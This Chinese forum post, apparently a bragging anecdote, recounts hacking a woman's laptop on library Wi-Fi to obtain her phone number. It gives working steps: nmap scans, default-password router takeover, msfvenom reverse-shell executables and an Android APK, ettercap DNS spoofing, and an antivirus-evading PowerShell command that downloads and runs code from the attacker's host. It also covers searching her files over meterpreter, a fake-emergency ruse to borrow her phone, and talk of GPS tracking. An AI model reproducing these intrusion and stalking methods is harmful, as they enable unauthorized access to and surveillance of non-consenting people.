七网科技
本页定位
在线咨询

吾群大神《图书馆撩妹记》

Yeshisan3个月前1647A+A-

论泡妞的技术含量——下面请看吾群(7717114)大神(Yeshisan)的《图书馆撩妹记》

技术肥宅遇到好看的妹子不敢上去问联系方式怎么办? 技术的力量
虽然我们两个人有一个长得贼帅,还是情圣。但我觉得还是走装逼路线。

起因

有一位伟人曾经说过:人不可能无缘无故去干一件事情。
简单交代下起因:图书馆遇到一个妹子,长得很漂亮。

作为一个死宅,上去撩那是不存在的,那么我就想着能不能通过某些方式去获取她的联系方式。

我们按照正常的思维来思考,一个人的电脑里会有什么东西。如果电脑内有报名表之类的信息,那么上面是不是有手机号,邮箱这一些联系方式???

我们的切入点就是电脑。

通过多年的猥琐经验,我可以断定妹子是一个学生,电脑里也有这些东西。(不要问我怎么知道的)

思路

个人电脑并不像服务器拥有固定的IP地址,所以我们搞渗透测试那一套就可以抛弃了。别说没有固定IP,即使有,在全球怎么多IP里面去找出一个IP地址几乎不可能。但是图书馆有免费WIFI啊。只要我们连上WIFI那么我们是不是就和妹子处在同一网段下,是不是可以通过探测内网存活IP列表再找出DHCP分配给妹子的内网地址,通过扫描端口进行搞事。

先来看一下当前路由器DHCP给我们分配的IP地址

Root@promote:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet)
RX packets 34 bytes 2820 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 3407 (3.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

当前的IP地址为:192.168.1.123,那么网关也就是192.168.1.1了
内网的IP地址是0/255,也就是说我们只要扫描0-255这个数值有哪些IP是存活的

root@promote:~# nmap -sP 192.168.1.0/24

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:35 CST
Nmap scan report for bogon (192.168.1.1)
Host is up (0.0012s latency).
MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00019s latency).
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Nmap scan report for bogon (192.168.1.103)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

通过nmap进行探测,当前存活的IP一共是106和103这两个。说明一下这是我复现搭建的环境,实际情况远不止这几个IP。那么怎么去判断哪个IP分配给妹子的呢。
这里可以通过抓取数据包去判断,当然我选了一种最简单粗暴的,窥屏。

由于图书馆就怎么几个人,带电脑的就我们两个,还有前台的电脑。所以我觉得窥屏是最有效的方法。

win10(前台) win7(妹子)kali linux(我)

那么只要去探测哪个IP的操作系统版本是win7,就可以确定目标。

root@promote:~# nmap -O 192.168.1.106

Starting Nmap 7.40 ( [url]https://nmap.org[/url] ) at 2017-06-25 22:37 CST
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at [url]https://nmap.org/submit/[/url] .
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

最后的检测结果是106这个IP地址是win7,使用-O参数的同时,nmap会自动去探测目标系统开放的端口服务。那么我们可以通过一些端口服务的漏洞进行搞事。比如说445端口。

通过metasploit对这些服务尝试漏洞利用,但无果。

跑厕所抽了一根烟,有了一个大胆的想法。既然正面出击不行,那我可以走迂回路线,先用msf生成木马,然后通过dns劫持把妹子访问的所有网址重定向到我的IP上。诱导妹子去下载我们生成的木马。

但是很多路由器现在都有一些防御机制,比如arp劫持这一些防护,所以我得先把路由器的机制给干掉。打开路由器的界面,默认密码一敲,进去了。。。。。。。。。突然感觉我的运气还是不错的,不管这些细节,直接把路由器的所有防护机制给关了。

然后,先来生成一个exe的木马。

root@book:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

启动metasploit进行监听。
msf > use exploit/multi/handler //载入模块
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //载入payload,与生成木马的payload一致
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options //查看需要设置的选项

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123 //设置监听IP地址
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444 //设置监听端口
LPORT => 4444
msf exploit(handler) > run //开始监听

Started reverse TCP handler on 192.168.1.123:4444
Starting the payload handler...
Sending stage (1189423 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800
Sending stage (1189423 bytes) to 192.168.1.106
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

生成木马以后,编辑ettercap工具的dns配置文件进行修改。

Vim /etc/ettercap/etter.dns

通配符 代表所有域名
A和PTR后面的就是指向地址,因为使用的是通配符,也就是说当我们开启劫持以后,目标无论访问什么样的站点,最后都会指向到我们kali的这台机器
修改完以后开启Apache服务。

Service apache2 start

之后启动ettercap,关于ettercap如何进行dns欺骗,不懂的可以看这篇文章。
https://blog.csdn.net/hy_696/article/details/74640519
接着把木马复制到网站的根目录下

root@book:~$ cp test.exe /var/www/html

注意:你可以写一个html网页进行伪装,比如弹出浏览器版本过低请安装最新版本重新访问之类的话语,然后弹出下载地址。

在经历漫长的等待后,msf还是没有到来自目标的回话。

我又去窥了一下屏,在妹子电脑的右下角看到了一个熟悉的图标。

略微有点小尴尬,因为生成的木马是不免杀的,所以99.99%的几率可能被360拦截了。所以这里需要把木马做一下免杀,这里我打算用PowerShell生成一段利用代码保存为bat文件,再次诱导目标下载。经过测试通过360进行查杀,会显示为病毒。但实际执行的时候,360就瞎了,不会有任何提示。

msf > use exploit/multi/script/web_delivery //载入模块
msf exploit(web_delivery) > info //查看需要设置的选项

Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19

Provided by:
Andrew Smith "jakx" <[email]jakx.ppr@gmail.com[/email]>
Ben Campbell <[email]eat_meatballs@hotmail.co.uk[/email]>
Chris Campbell

Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module quickly fires up a web server that serves a payload. The
provided command will start the specified scripting language
interpreter and then download and execute the payload. The main
purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command
himself, e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Exec. This attack vector does not write to disk so it
is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64
machines.

References:
[url]http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html[/url]
[url]http://www.pentestgeek.com/2013/07/19/invoke-shellcode/[/url]
[url]http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/[/url]
[url]http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html[/url]

msf exploit(web_delivery) > set URIPATH / 设置为根路径
URIPATH => /
msf exploit(web_delivery) > set target 2 //设置保存文件的类型,这里是PSH
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payload
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options //查看设置选项

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > set LHOST 192.168.1.123 //设置反连IP
LHOST => 192.168.1.123
msf exploit(web_delivery) > set LPORT 4444 //设置反连端口
LPORT => 4444
msf exploit(web_delivery) > run //配置好选项直接run,msf会自动生成一端pwoershell的代码
Exploit running as background job.
Started reverse TCP handler on 192.168.1.123:4444
Using URL: [url]http://0.0.0.0:8080/[/url]
Local IP: [url]http://192.168.1.123:8080/[/url]
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/'); 生成的powershell代码

把最后的这段powershell代码复制保存为bat文件,移动到网站目录下。

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');

当目标运行后,成功拿到一个meterpreter回话

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering Payload
Sending stage (957487 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800
sessions 1
Starting interaction with 1...

meterpreter >

有了这个会话我们就可以干很多事情,比如搜索系统上的图片文件和文档文件,这些文件内可能就有我们想要的联系方式,至于图片吗。。。这就不说了。。

通过某个word文件成功获取到妹子的手机号和邮箱,通过微信添加好友搜索到妹子的微信,对比头像,emmm确认过眼神,你是本人。

然而你以为这样就结束了吗?

虽然通过系统上的文件获取到了联系方式,但是如果我们能把手机也给搞了,那里面的东西是不是更多,还可以通过手机的GPS获取到位置。。。。呃。。。后面的我就不说了,发挥想象力吧。

通过内网我们很幸运的获取到了我们想要的东西,但是妹子只要离开图书馆,我们的木马就没有任何作用了,因为在生成木马的时候,我设置的是连接内网的IP地址。所以我们需要一台公网的服务器,来长久的控制妹子的手机或者是电脑,至于生成exe木马我就不重复了,参照上面把IP地址改成公网的就行。下面说一说手机的木马。由于妹子用的是安卓的手机,这里我们来搞个安卓的木马。

root@book:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Error: The following options failed to validate: LPORT.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > run

[-] Handler failed to bind to 192.168.1.123:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...

老套路,还是把木马移动到根目录下。

接下来,我的思路是去找妹子借手机,然后访问kali的ip地址下载这个木马进行安装。那么问题来了,怎么样借到手机。拿起我的手机假装打电话,随便找个人什么出车祸了,快挂了。声泪俱下,突然之间手机就没电了,然后找妹子借电话。

emmm,妹子还是挺有同情心的。。。

旁边的哥们一脸懵逼:这TM也行。。。。

出于无聊和好玩并无任何非分想法,我跟妹子说了整件事情,并且和妹子互相交换了微信,直到今天妹子依旧见我一次打我一次。

相关推荐
全部评论: 4
登录没有账号 切换注册

忘记密码 ?

注册已有账号 切换登录